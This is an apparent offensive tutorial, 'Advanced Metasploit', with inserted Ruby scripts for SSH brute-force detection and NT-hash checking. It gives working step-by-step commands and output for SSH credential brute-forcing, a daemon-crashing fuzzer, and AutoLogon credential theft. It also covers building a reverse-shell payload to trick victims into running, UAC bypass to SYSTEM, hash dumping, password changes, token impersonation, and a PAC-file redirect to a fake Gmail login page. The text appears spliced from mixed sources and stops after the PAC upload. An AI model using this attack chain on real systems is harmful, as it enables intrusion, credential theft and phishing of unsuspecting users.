Contents · 2017. 4. 3. · 3.a NOP generator ... Credential harvesting is a social engineering technique that is used to get a user and password for user login, SSH, and others

Contents

Introduction

1. AUXILIARY

1.a Scanners

1.b Fuzzers

1.c Credential harvesting

2. POST EXPLOITATION

2.a Privilege escalation

2.b IE proxy PAC

3. MISCELLANEOUS

3.a NOP generator

3.b Encoders

4. Advanced module/payload configuration options

5. Writing custom Metasploit modules

6. Stealthy techniques when using Metasploit


Advanced Metasploit

Introduction

Metasploit is an open source security framework created by HD Moore in 2003. It contains a large number of exploits and, because it is built as a framework, any user can load the modules they need and combine them. Metasploit has the architecture shown below:

FIGURE 1: METASPLOIT ARCHITECTURE

In this article I explain how to use Metasploit to take over a computer by scanning for SSH and then brute-forcing the username and password. I also show how to perform fuzzing, how encoders can be used to build a Trojan that antivirus does not detect, and how fake logins can be used for credential harvesting. Once inside the target computer, I show how to manipulate processes with stealthy techniques, take a user token on the target, change a username and password, and escalate privileges. Finally, I explain how to write a custom Metasploit module, how a NOP sled makes an exploit more stable, and how a proxy PAC file can be used to steal someone's bank account.


1. AUXILIARY

Auxiliary modules are modules that do not carry a payload. They cover port scanning, fingerprinting, service scanning and similar tasks, and are grouped by type: scanners, network protocol fuzzers, wireless, denial of service, and so on.

1.a Scanners

The scanner modules under auxiliary collect information on targets, from open ports up to identifying the operating system in use. See the illustration below:

FIGURE 2: SSH BRUTEFORCE

The illustration shows how an attacker gains access at a company that provides Wi-Fi to visitors.

There are scanner modules for many services, including DCERPC, Discovery, FTP, HTTP, IMAP, MSSQL, MySQL, NetBIOS, POP3, SMB, SMTP, SNMP, SSH, Telnet, TFTP, VMware, and VNC. For this article I scan SSH, using the auxiliary SSH login module to brute-force the username and password. To get started, type msfconsole in the terminal.

root@sungai:~# msfconsole

FIGURE 3: STARTING METASPLOIT


After Metasploit loads, I select the ssh_login module:

msf > use auxiliary/scanner/ssh/ssh_login

Then I set the target to be scanned:

msf auxiliary(ssh_login) > set RHOSTS 192.168.109.132

RHOSTS => 192.168.109.132

FIGURE 4: SETTING IP TARGET

To brute-force the SSH login, the module needs a dictionary. The options that take the user and password lists are shown with:

msf auxiliary(ssh_login) > show options

FIGURE 5: SEE THE COMMAND FOR SETTING DICTIONARY

I use the USERPASS_FILE option, which takes a file with one "username password" pair per line (USER_FILE and PASS_FILE, by contrast, try every user against every password):

msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt


FIGURE 6: SETTING USERPASS_FILE

After setting the wordlist to use for the brute force, I run the module:

msf auxiliary(ssh_login) > run

Note: the larger the userpass wordlist, the longer the run takes.

The results of the SSH scan look more or less like the following image.

FIGURE 7: STARTING BRUTE FORCE SSH

The results are as shown below:

[*] 192.168.109.1:22 SSH - Starting brute force
[*] Command shell session 2 opened (192.168.109.130:53371 -> 192.168.109.1:22) at 2015-08-30 03:24:14 -0400
[+] 192.168.109.1:22 SSH - [01/52] - Success: 'cupenkz':'it-trad.com' 'uid=1001(cupenkz) gid=1003(cupenkz) groups=1003(cupenkz) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 3.19.2-201.fc21.x86_64 #1 SMP Tue Mar 24 03:08:23 UTC 2015 x86_64 x86_64 GNU/Linux '

The target 192.168.109.1, port 22, has a user named "cupenkz" with the password "it-trad.com". Note that ssh_login opens a shell session for every successful login, so there is no separate exploitation step. The open sessions are listed with:

msf auxiliary(ssh_login) > sessions -l

Note: -l lists the active sessions; -i <id> interacts with one of them.

Active sessions
===============

  Id  Type         Information                                  Connection
  --  ----         -----------                                  ----------
  2   shell linux  SSH cupenkz:it-trad.com (192.168.109.1:22)   192.168.109.130:53371 -> 192.168.109.1:22 (192.168.109.1)
  3   shell linux  SSH cupenkz:it-trad.com (192.168.109.1:22)   192.168.109.130:36248 -> 192.168.109.1:22 (192.168.109.1)

FIGURE 8: RESULT OF SSH BRUTEFORCE

Once a session exists, you can interact with the target directly:

msf auxiliary(ssh_login) > sessions -i 2

Note: -i interacts with the session whose ID you give; this command drops into session 2.

FIGURE 9: RUNNING SESSION 2

After you get a shell on the target you only have the access of that user, but you can gain root if you know a vulnerability (or a misconfiguration such as unrestricted sudo) in the OS.
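The ssh_login run above leaves a characteristic trail on the target: a burst of "Failed password" lines from one source, followed by an "Accepted password" for the account that finally worked. The following Ruby script is an added example, not code from the article or from Metasploit: it parses constructed sshd auth.log lines and flags that pattern. The log lines, the threshold of five failures within 60 seconds, the function names and the use of 192.168.109.130 (the attacker host in the session listing above) as the noisy source are assumptions made for the demonstration.

```ruby
require 'time'

# Constructed sample of OpenSSH auth.log lines (an assumption for this example, not output
# from the page): six failures from one source in six seconds, then a successful password
# login from the same source, plus two unrelated events.
SAMPLE_AUTH_LOG = <<~LOG
  Aug 30 03:24:01 localhost sshd[2201]: Failed password for root from 192.168.109.130 port 53301 ssh2
  Aug 30 03:24:02 localhost sshd[2203]: Failed password for invalid user admin from 192.168.109.130 port 53305 ssh2
  Aug 30 03:24:03 localhost sshd[2205]: Failed password for invalid user oracle from 192.168.109.130 port 53310 ssh2
  Aug 30 03:24:04 localhost sshd[2207]: Failed password for root from 192.168.109.130 port 53314 ssh2
  Aug 30 03:24:05 localhost sshd[2209]: Failed password for cupenkz from 192.168.109.130 port 53320 ssh2
  Aug 30 03:24:06 localhost sshd[2211]: Failed password for cupenkz from 192.168.109.130 port 53330 ssh2
  Aug 30 03:24:14 localhost sshd[2213]: Accepted password for cupenkz from 192.168.109.130 port 53371 ssh2
  Aug 30 03:25:40 localhost sshd[2250]: Failed password for alice from 10.0.0.5 port 40110 ssh2
  Aug 30 03:26:02 localhost sshd[2260]: Accepted publickey for ops from 10.0.0.7 port 50122 ssh2: RSA SHA256:abc
LOG

PREFIX    = /\A(\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: /
FAILED_RE = /#{PREFIX}Failed password for (?:invalid user )?(\S+) from (\d+(?:\.\d+){3}) port \d+/
ACCEPT_RE = /#{PREFIX}Accepted (?:password|publickey) for (\S+) from (\d+(?:\.\d+){3}) port \d+/

# Turn log text into auth events: { time:, kind: :fail or :ok, user:, ip: }.
def parse_sshd(text)
  events = []
  text.each_line do |line|
    if (m = FAILED_RE.match(line))
      events << { time: Time.parse(m[1]), kind: :fail, user: m[2], ip: m[3] }
    elsif (m = ACCEPT_RE.match(line))
      events << { time: Time.parse(m[1]), kind: :ok, user: m[2], ip: m[3] }
    end
  end
  events
end

# Flag a source address once `threshold` failures land inside any `window` seconds, and
# report the accounts that source then logged into successfully: a burst alone is the
# background noise of scanners, a burst followed by an Accepted line is a likely compromise.
def detect_bruteforce(events, threshold: 5, window: 60)
  alerts = {}
  events.group_by { |e| e[:ip] }.each do |ip, evs|
    evs = evs.sort_by { |e| e[:time] }
    fails = evs.select { |e| e[:kind] == :fail }
    burst = fails.each_cons(threshold).any? { |run| run.last[:time] - run.first[:time] <= window }
    next unless burst
    first_fail = fails.first[:time]
    compromised = evs.select { |e| e[:kind] == :ok && e[:time] >= first_fail }.map { |e| e[:user] }.uniq
    alerts[ip] = { failures: fails.size, compromised: compromised }
  end
  alerts
end

if __FILE__ == $PROGRAM_NAME
  detect_bruteforce(parse_sshd(SAMPLE_AUTH_LOG)).each do |ip, a|
    puts "#{ip}: #{a[:failures]} failed logins, then accessed #{a[:compromised].inspect}"
  end
end
```

On the sample the script reports 192.168.109.130 with six failures and a subsequent login as cupenkz, while the single failure from 10.0.0.5 and the key-based login from 10.0.0.7 stay quiet. The same logic is what tools such as fail2ban apply in real time; the "accepted after burst" rule is the one worth paging on.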

1.b Fuzzers

Fuzzing sends malformed or unexpected input to an application used by the target in order to find weaknesses. Such weaknesses often make the application crash, and in some cases can be turned into access to the target. Metasploit contains fuzzer modules for several protocols, including DNS, FTP, SSH, HTTP, SMB, SMTP, and TDS. However, not every version of these applications can be crashed by the fuzzer modules in Metasploit.

This technique is illustrated below:

FIGURE 10: ILLUSTRATION OF FUZZING SSH

The illustration shows that, if a company offers Wi-Fi access, others can join and abuse it. Attackers can scan the company's computers and, if the SSH service on those computers is vulnerable, target it to cause a crash.

To start fuzzing, run Metasploit first:

root@sungai:~# msfconsole

FIGURE 11: RUNNING METASPLOIT

After Metasploit runs, select the SSH version fuzzer:

msf > use auxiliary/fuzzers/ssh/ssh_version_corrupt

msf auxiliary(ssh_version_corrupt) >

Before using the fuzzer, it is worth scanning the target with nmap to confirm that it is actually running SSH. I use:

root@sungai:~# nmap -sS -v -A 192.168.109.1

Note:

-sS performs a TCP SYN (half-open) scan


-v is verbose output (more detail while scanning)

-A enables OS detection, version detection, script scanning, and traceroute

Results of the scan are shown below:

FIGURE 12: NMAP SCAN RESULTS

You can see from the picture that 192.168.109.1 has port 22 open and is running OpenSSH 6.6.1.

To see what the fuzzer module needs, use:

msf auxiliary(ssh_version_corrupt) > info

The following options are shown:

MAXDEPTH limits how many bytes of the SSH version string the fuzzer corrupts

RHOST is the target IP

RPORT is the target port

Before running the fuzzer, I set MAXDEPTH and RHOST as follows:


FIGURE 13: SETTING MAXDEPTH AND RHOST SSH FUZZER

The picture above shows the settings for the number of bytes corrupted, the target IP, and the target port.

To apply the settings, use the following (option names are case-insensitive, so maxdepth sets MAXDEPTH):

msf auxiliary(ssh_version_corrupt) > set maxdepth 999999999999

maxdepth => 999999999999

msf auxiliary(ssh_version_corrupt) > set rhost 192.168.109.1

rhost => 192.168.109.1

A MAXDEPTH larger than the version string simply means every byte of it gets corrupted. After the settings are correct, run the module:

msf auxiliary(ssh_version_corrupt) > run

FIGURE 14: SSH FUZZER RUNNING


The picture above shows Metasploit fuzzing the target, but not every SSH version is affected. If the SSH daemon on the target does not crash, it is most likely already patched. Remember that a successful run crashes the daemon, which is a denial of service against that host.

1.c Credential harvesting

Credential harvesting covers the techniques an attacker uses to collect usernames and passwords, whether for local logins, SSH, or other services. Some variants are social engineering (fake login pages); others, like the one shown here, read credentials that are already stored on a compromised machine. An illustration of credential harvesting is shown below.

FIGURE 15: CREDENTIAL HARVESTING

The image above shows that the attacker can retrieve the target's username and password from the AutoLogon settings, if the target has AutoLogon configured (Windows then keeps the password in clear text under the Winlogon registry key).

First, we must already have access to the target computer.

I gain access with Meterpreter, as shown below:

FIGURE 16: METERPRETER CONNECTED

After connecting with Meterpreter, I send the session to the background (the background command) and search for credential modules:

msf exploit(handler) > search credential

FIGURE 17: SEARCHING CREDENTIAL MODULE

Metasploit has many credential modules; here I use post/windows/gather/credentials/windows_autologin:

msf exploit(handler) > use post/windows/gather/credentials/windows_autologin


FIGURE 18: USING MODULE POST/WINDOWS/GATHER/CREDENTIALS/WINDOWS_AUTOLOGIN

The module's options can be seen with:

msf post(windows_autologin) > show options

FIGURE 19: SHOWING OPTION MODULE WINDOWS_AUTOLOGIN

The picture above shows the options in the module. The only one I need to set is SESSION, the Meterpreter session the module runs through. I list the sessions, then set it:

msf post(windows_autologin) > sessions -l

FIGURE 20: SEEING SESSION ACTIVE IN TARGET

msf post(windows_autologin) > set SESSION 1

FIGURE 21: SETTING SESSION ON MODULE WINDOWS AUTO LOGIN

After setting the option, I run the module:


msf post(windows_autologin) > exploit

FIGURE 22: EXPLOIT RUNNING

The picture shows the module revealing the username and password stored on the target computer:

user: cupenkz

password [No Password!]

Domain: FATBOYGAG-SLIM

When the target does not have AutoLogon configured, the module finds nothing and shows something like the image below:

FIGURE 23: EXPLOIT NOT WORKING


2. POST EXPLOITATION

Once inside, an attacker can go further into the target's internal network, for example by sniffing packets, and can plant a backdoor to retain access to the target.

2.a Privilege escalation

Privilege escalation lets an attacker who has taken over a computer through an exposed vulnerability raise the level of access obtained, as in the following illustration:

FIGURE 24: PRIVILEGE ESCALATION

In this example my target is Windows 7 Ultimate 32-bit. To find the OS in use I scan it with:

root@sungai:~# nmap -sS -v -A 192.168.130.1

FIGURE 25: SCANNING USE NMAP

Note:

-sS performs a TCP SYN scan

-v is verbose output

-A enables OS detection, version detection, script scanning, and traceroute

The results are as shown below.


FIGURE 26: THE RESULT FROM SCANNING USE NMAP

To perform privilege escalation I first build an executable that runs the payload; when the target runs it, it connects back to the attacker's computer. I use msfpayload:

root@sungai:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.130.128 LPORT=4444 X > /var/www/cupenkz.exe

FIGURE 27: LOADING MSFPAYLOAD TO MAKE A MALICIOUS FILE

Note:

- msfpayload generates the payload, here a reverse_tcp Meterpreter

- LHOST is the attacker's IP

- LPORT is the port on the attacker's computer that the payload connects back to

- X outputs a Windows executable, redirected here into cupenkz.exe

- msfpayload and msfencode were removed from the framework in 2015; on a current install the same file is produced with msfvenom, where -p selects the payload, -f exe chooses the format and -o names the output file

After building the payload, you need to trick the target into running it unnoticed, for example by bundling it with a program such as a crack, or with a USB autorun script that installs it on the target computer; once installed, the application runs. Here I only give an example of how to get the application executed on the target.

After that, I start the handler on the attacker's computer: load exploit/multi/handler, set the same payload, LHOST and LPORT as above, and run it:

FIGURE 28: USING EXPLOIT/MULTI/HANDLER IN COMPUTER ATTACKER


The handler waits so that, when cupenkz.exe is executed on the target computer, the attacker's computer is ready to receive the reverse connection from the target.

FIGURE 29: RUNNING EXPLOIT HANDLER AND THE TARGET 192.168.130.1 CONNECTED FOR RUNNING THE PROGRAM CUPENKZ.EXE

After setting LHOST on the attacker's computer, I run:

msf exploit(handler) > run

Then, when the file we placed earlier (cupenkz.exe) is executed by the target, it looks like the image above.

The access obtained this way is usually limited to the user that ran the file, not Administrator or SYSTEM.

FIGURE 30: ACCESS IS DENIED

I tried getsystem on the target:

meterpreter > getsystem

FIGURE 31: GETSYSTEM FAIL

We only have user-level access and cannot reach SYSTEM; I check the current user with:

meterpreter > getuid


FIGURE 32: THE POSITION OF THE CURRENT USER

Next I look at the help for getsystem:

meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
                0 : All techniques available
                1 : Service - Named Pipe Impersonation (In Memory/Admin)
                2 : Service - Named Pipe Impersonation (Dropper/Admin)
                3 : Service - Token Duplication (In Memory/Admin)

Three techniques are available for raising access on the target computer. All of them carry the "/Admin" tag: they only work from a process that already holds an elevated administrator token, which is why getsystem failed above from a UAC-restricted session. The session has to be elevated first, and that is what the local bypassuac exploit is for.

The first technique, 1. Service - Named Pipe Impersonation (In Memory/Admin), is what I use after running a local exploit on the target computer. Local exploits are used to take full control of the target computer. I first send Meterpreter to the background:

FIGURE 33: RUNNING METERPRETER AS BACKGROUND

msf exploit(handler) > search uac


FIGURE 34: SEARCHING MODULE LOCAL EXPLOIT BYPASSUAC

msf exploit(handler) > use exploit/windows/local/bypassuac

Above I search for the local exploit named bypassuac, which targets Windows 7 among others, select it, and then set the session the local exploit runs through.

FIGURE 35: SETTING SESSION

msf exploit(bypassuac) > set SESSION 2

After setting the session, I run the local exploit:

msf exploit(bypassuac) > exploit


FIGURE 36: RUNNING BYPASSUAC EXPLOIT LOCAL WINDOWS 7

The local bypassuac exploit creates a new, elevated Meterpreter session. I list the sessions and interact with the new one:

msf exploit(bypassuac) > sessions -l

msf exploit(bypassuac) > sessions -i 2

FIGURE 37: CHANGING SESSION

Now I check whether the access is still restricted, by running getsystem again.

FIGURE 38: ACCESS BY USING GETSYSTEM

The picture above shows getsystem succeeding from the elevated session. I now hold NT AUTHORITY\SYSTEM, the Windows equivalent of the root account; with it you can access the entire contents of the target computer.


UAC (User Account Control) is a security feature in Windows. An action that needs administrator rights, such as installing software or modifying system files, triggers a UAC prompt asking for confirmation. The feature can be disabled so that you are not disturbed by the frequent question "Do you want to allow the following program to install software on this computer?", but doing so removes the protection.

User Account Control is a technology and security infrastructure introduced with Microsoft's Windows Vista and Windows Server 2008 operating systems, with a more relaxed[1] version also present in Windows 7 and Windows Server 2008 R2. It aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it.

Why do we need an exploit to bypass UAC? An exploit is the means by which we take over the targeted computer, and there are two kinds: remote and local. A remote exploit is used when an application on the target has a vulnerability that can be reached over the network (through an open port); SSH and FTP services are examples. A local exploit instead abuses a weakness in software already present on the target computer, and is run from a foothold you already have. See the illustrations below.

FIGURE 39: REMOTE EXPLOIT

The figure shows a remote exploit: the attacker scans the target's SSH, finds a vulnerability in it, and attacks with a remote SSH exploit.

FIGURE 40: LOCAL EXPLOIT

This illustration shows the attacker already on the target, seeing that its UAC can be bypassed, and running the local bypassuac exploit to raise the user's privileges. That is the difference between a local and a remote exploit.

Bypass UAC is a technique that turns a UAC-restricted administrator account (one that is a member of Administrators but runs with a filtered, standard-user token) into a fully elevated process without the user being asked to confirm. It does not work for a plain standard user, who has no administrator rights to unlock. In this example I used the bypassuac local exploit in Metasploit. It writes an executable to the target, places it in a Windows directory where it will be loaded by an auto-elevating process, and when that runs, spawns a payload with the elevated token. An illustration can be seen in the figure below:


FIGURE 41: BYPASSUAC

The illustration shows roughly how UAC is bypassed:

1. Meterpreter connect: the attacker must already have a Meterpreter connection to the target.

2. Upload malicious file: the attacker builds the malicious file with bypassuac, uploads it to the target computer and places it in a specific directory on the target system.

3. Execute file: the attacker executes the file created earlier.

4. Create Meterpreter session: the malicious file opens a new session back through Meterpreter.

The second technique, 2. Service - Named Pipe Impersonation (Dropper/Admin)

While the technique above works through the file system on the target computer, here I use the Windows API through railgun, one of the Meterpreter extensions in Metasploit. Railgun lets you call functions in Windows DLLs directly from the Meterpreter session, in the context of the current process.

The Windows API functions themselves are documented on msdn.microsoft.com, so I will not explain them at length here.

I use an IRB shell to drive railgun:

meterpreter > irb

[*] Starting IRB shell

[*] The 'client' variable holds the Meterpreter client

Then I check which DLLs railgun already knows about:

>> client.railgun.known_dll_names

=> ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"]

>>

FIGURE 42: DLLS USED IN RAILGUN

Those are the twelve DLLs defined by default in railgun; here I use netapi32 to change a user's password on the target computer.

First I check which users exist on the target, with:

meterpreter > hashdump

admin:1003:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cupenkz:1004:aad3b435b51404eeaad3b435b51404ee:ebb51400c232862211db317da0793bc9:::
fatboygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
UpdatusUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::

FIGURE 43: CUPENKZ USER PASSWORD BEFORE CHANGING EBB51400C232862211DB317DA0793BC9

The dump shows six local users on the target (hashdump itself needs SYSTEM privileges, which the elevated session provides). Now I change the cupenkz password with:

>> client.railgun.netapi32.NetUserChangePassword(nil, "cupenkz", "cupenkz", "cupenkz123")

Note:

- client.railgun.netapi32.NetUserChangePassword <= call the NetUserChangePassword function from netapi32.dll

- nil <= domainname (nil uses the caller's logon domain, here the local computer)

- cupenkz <= username

- cupenkz <= oldpassword

- cupenkz123 <= newpassword

FIGURE 44: COMMAND NETUSERCHANGEPASSWORD, NETAPI32 SUCCESSFULLY

To check whether the cupenkz password really changed, I dump the hashes again:

meterpreter > hashdump


admin:1003:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cupenkz:1004:aad3b435b51404eeaad3b435b51404ee:cd84df77d079b66945e777398b4d4937:::
fatboygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
UpdatusUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::

FIGURE 45: CUPENKZ PASSWORD HAS BEEN REPLACED TO BECOME CD84DF77D079B66945E777398B4D4937

The NT hash of cupenkz was ebb51400c232862211db317da0793bc9 before the change and is cd84df77d079b66945e777398b4d4937 afterwards; the other five entries are unchanged. Two other things the dump tells you: the first hash field, aad3b435b51404eeaad3b435b51404ee, is the LM hash of an empty password on every line, so LM hashes are not stored on this machine, and the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 on Administrator and Guest is the hash of an empty password, which is normal for the disabled built-in accounts on Windows 7.

For more detail, the railgun definition of netapi32.dll lives in this directory:

root@sungai:~# cd /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/def

root@sungai:/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/def# less def_netapi32.rb

and the NetUserChangePassword function is declared there as:

dll.add_function('NetUserChangePassword', 'DWORD', [
  ["PWCHAR","domainname","in"],
  ["PWCHAR","username","in"],
  ["PWCHAR","oldpassword","in"],
  ["PWCHAR","newpassword","in"]
])

That declaration is what lets railgun marshal the call into netapi32.dll. Once the password is changed you can log in as that user, for example over RDP. The technique is useful when you only hold a user's session but know (or have cracked) their password: NetUserChangePassword needs the old password, not administrator rights. With administrator rights you can go further and use other netapi32 functions to create a new account or add one to the Administrators group. Bear in mind that changing a password is noisy: the legitimate user is locked out at their next logon, and the change is recorded in the Security event log (event ID 4723 for a password change, 4724 for an administrative reset).
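The two hashdump listings above are worth reading rather than just comparing by eye. The following Ruby is an added example, not code from the article or from Metasploit: it implements MD4 in pure Ruby (so it does not depend on an OpenSSL build that still ships MD4), derives NT hashes as MD4 of the UTF-16LE password, parses hashdump lines, and answers the questions the listings raise: which accounts have an empty NT hash, whether LM storage is disabled, and whether a known password (such as the one just set through NetUserChangePassword) matches a given entry. The six dump lines are the pre-change listing from the page; the function names and the check against the well-known NT hash of "password" are my own additions.

```ruby
MASK32 = 0xFFFFFFFF

def rotl32(x, n)
  ((x << n) | (x >> (32 - n))) & MASK32
end

# Pure-Ruby MD4 (RFC 1320): three rounds of 16 steps over 64-byte blocks, little-endian.
def md4(data)
  msg = data.b
  bit_len = msg.bytesize * 8
  msg << "\x80".b
  msg << "\x00".b until msg.bytesize % 64 == 56
  msg << [bit_len & MASK32, bit_len >> 32].pack('V2')
  a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
  (0...msg.bytesize).step(64) do |off|
    x = msg.byteslice(off, 64).unpack('V16')
    aa, bb, cc, dd = a, b, c, d
    16.times do |i|                                            # round 1: F = (b & c) | (~b & d)
      a = rotl32((a + ((b & c) | (~b & d)) + x[i]) & MASK32, [3, 7, 11, 19][i % 4])
      a, b, c, d = d, a, b, c
    end
    16.times do |i|                                            # round 2: G = majority(b, c, d)
      k = (i % 4) * 4 + i / 4
      a = rotl32((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5a827999) & MASK32, [3, 5, 9, 13][i % 4])
      a, b, c, d = d, a, b, c
    end
    [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15].each_with_index do |k, i| # round 3: H = b ^ c ^ d
      a = rotl32((a + (b ^ c ^ d) + x[k] + 0x6ed9eba1) & MASK32, [3, 9, 11, 15][i % 4])
      a, b, c, d = d, a, b, c
    end
    a = (a + aa) & MASK32
    b = (b + bb) & MASK32
    c = (c + cc) & MASK32
    d = (d + dd) & MASK32
  end
  [a, b, c, d].pack('V4').unpack('H*').first
end

# NT hash: MD4 over the password encoded as UTF-16LE, no salt.
def nt_hash(password)
  md4(password.encode('UTF-16LE'))
end

# LM hash of an empty password: present on every line when LM storage is disabled.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'

# The pre-change hashdump from the page (user:rid:lmhash:nthash:::).
HASHDUMP_BEFORE = <<~DUMP
  admin:1003:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f:::
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  cupenkz:1004:aad3b435b51404eeaad3b435b51404ee:ebb51400c232862211db317da0793bc9:::
  fatboygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  UpdatusUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::
DUMP

Entry = Struct.new(:user, :rid, :lm, :nt)

def parse_hashdump(text)
  text.each_line.map(&:strip).reject(&:empty?).map do |line|
    user, rid, lm, nt = line.split(':')
    Entry.new(user, rid.to_i, lm.downcase, nt.downcase)
  end
end

# Accounts whose NT hash is the hash of "": no password set, typically disabled built-ins.
def empty_password_accounts(entries)
  accounts_using(entries, '')
end

# Accounts whose NT hash matches a candidate password; run against the post-change dump
# with the new password to confirm NetUserChangePassword took effect without logging in.
def accounts_using(entries, password)
  h = nt_hash(password)
  entries.select { |e| e.nt == h }.map(&:user)
end

def lm_disabled?(entries)
  entries.all? { |e| e.lm == EMPTY_LM }
end

if __FILE__ == $PROGRAM_NAME
  entries = parse_hashdump(HASHDUMP_BEFORE)
  puts "empty NT hash:  #{empty_password_accounts(entries).inspect}"
  puts "LM disabled:    #{lm_disabled?(entries)}"
  puts "using 'password': #{accounts_using(entries, 'password').inspect}"
end
```

Looping accounts_using over a wordlist is the whole of an offline attack on a SAM dump, which is why an NT hash should be treated as equivalent to the password itself (it is also what pass-the-hash uses directly).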


The third technique, 3. Service - Token Duplication (In Memory/Admin), involves stealing a token that already exists on the system. I use the incognito extension in Metasploit to steal tokens on the target. Load it with:

meterpreter > use incognito

Loading extension incognito...success.

meterpreter >

FIGURE 46: USING INCOGNITO

(On current Meterpreter builds the command is load incognito; use is the older alias.)

Then I check which user this Meterpreter session is running as:

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

Now I list the tokens present on the system:

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
fatboygag-slim\fatboygagslim
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
fatboygag-slim\UpdatusUser
NT AUTHORITY\ANONYMOUS LOGON


FIGURE 47: LISTING TOKENS USED IN TARGET

Note:

-u command for see list token

There are two tokens, DELEGATION and IMPERSONATION. DELEGATION is a token that can interact using the remote, but

it is not permanent, unlike the IMPERSONATION token.

After that, I would choose the token using the command:

Meterpreter > impersonate_token

Usage: impersonate_token <token>

Instructs the Meterpreter thread to impersonate the specified token. All oth-

er actions will then be made in the context of that token.

Hint: Double backslash DOMAIN\\name (Meterpreter quirk)

Hint: Enclose with quotation marks if name contains a space

Meterpreter >

FIGURE 48: IMPERSONATE_TOKEN

Here I will try to use the user token "fatboygag-slim\\fatboygagslim", with the command

Meterpreter > impersonate_token fatboygag-slim\\fatboygagslim

[+] Delegation token available


[+] Successfully impersonated user fatboygag-slim\fatboygagslim

FIGURE 49: IMPERSONATE_TOKEN SUCCESSFULLY

To check whether the token has been successfully used, I use the command:

Meterpreter > getuid

Server username: fatboygag-slim\fatboygagslim

FIGURE 50: IMAGE GETUID TOKEN SUCCESSFULLY

From the above explanation, we see that, once we are connected to the target, we can use an existing user token on the computer by means of incognito.

2.b IE proxy PAC

This is a technique in which the attacker inserts a fake login page for a website by tampering with IE's proxy configuration so that, when the target opens the site, the password is captured by the attacker, as shown below.

FIGURE 51: IE PROXY PAC

To run this technique, you should already have access to the target computer. Here, I have Meterpreter on the target via the exploit ms08_067_netapi, as shown in the following illustration:


FIGURE 52: METERPRETER USING EXPLOIT MS08_067_NETAPI

After I have opened the target with Meterpreter, I look for the ie_proxypac module with this command:

msf exploit(ms08_067_netapi) > search ie_proxy

FIGURE 53: SEARCHING IE_PROXY MODULE

After searching, there is one module for ie_proxy, so I load it with the command:

msf exploit(ms08_067_netapi) > use post/windows/manage/ie_proxypac


FIGURE 54: INFO MODULE IE_PROXYPAC

The picture above shows a brief description of the ie_proxypac module. Before running the module, I first look at its current settings with the command:

msf post(ie_proxy) > show options

FIGURE 55: OPTION MODULE IE_PROXYPAC

In the module above there are five options that can be set, but for AUTO_DETECT and DISABLE_PROXY I'm using the defaults. REMOTE_PAC loads a .pac file from a remote location, while LOCAL_PAC points to a .pac file on the attacker's computer that was made beforehand. I set the path /var/www/cupenkz.pac for the .pac file, as shown below:


FIGURE 56: CONTENT FILE CUPENKZ.PAC

The picture above shows a .pac file that, when www.gmail.com is opened, redirects the target computer to the IP 192.168.109.130, where a fake login page has already been posted.

After that, I did the setting for LOCAL_PAC with the command:

msf post(ie_proxy) > set LOCAL_PAC /var/www/cupenkz.pac

FIGURE 57: SETTING LOCAL_PAC

After setting the .pac file, I set the SESSION number on which to run the module. Before that, I check that the session on the target is active, using the command:

msf post(ie_proxy) > sessions -i

Note:

-i is the option for interacting with the session with the given ID number


FIGURE 58: CHECKING ACTIVE SESSION

Only one session is active, so I set it with the command:

msf post(ie_proxy) > set SESSION 1

FIGURE 59: SETTING SESSION USE NO 1

After all the settings are done, then run the command:

msf post(ie_proxy) > exploit

FIGURE 60: RUNNING IE_PROXYPAC

The picture above shows that the .pac file from the local computer has been uploaded to the target computer at the following path:

C:\Documents and settings\NetworkService\Application Data\hFTVnk.pac


